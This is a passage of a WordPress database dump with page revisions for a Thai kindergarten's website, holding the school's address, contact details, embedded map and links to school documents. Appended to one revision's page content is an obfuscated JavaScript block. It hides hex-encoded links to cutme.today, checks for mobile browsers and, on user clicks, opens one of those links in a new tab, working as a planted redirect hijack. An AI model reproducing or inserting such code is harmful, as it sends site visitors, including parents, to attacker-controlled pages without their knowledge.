src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 13:57:10','2024-08-30 06:57:10','',19,'http://watprato.ssk.in.th/?p=339',0,'revision','',0),
(341,2,'2024-08-30 14:09:03','2024-08-30 07:09:03','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 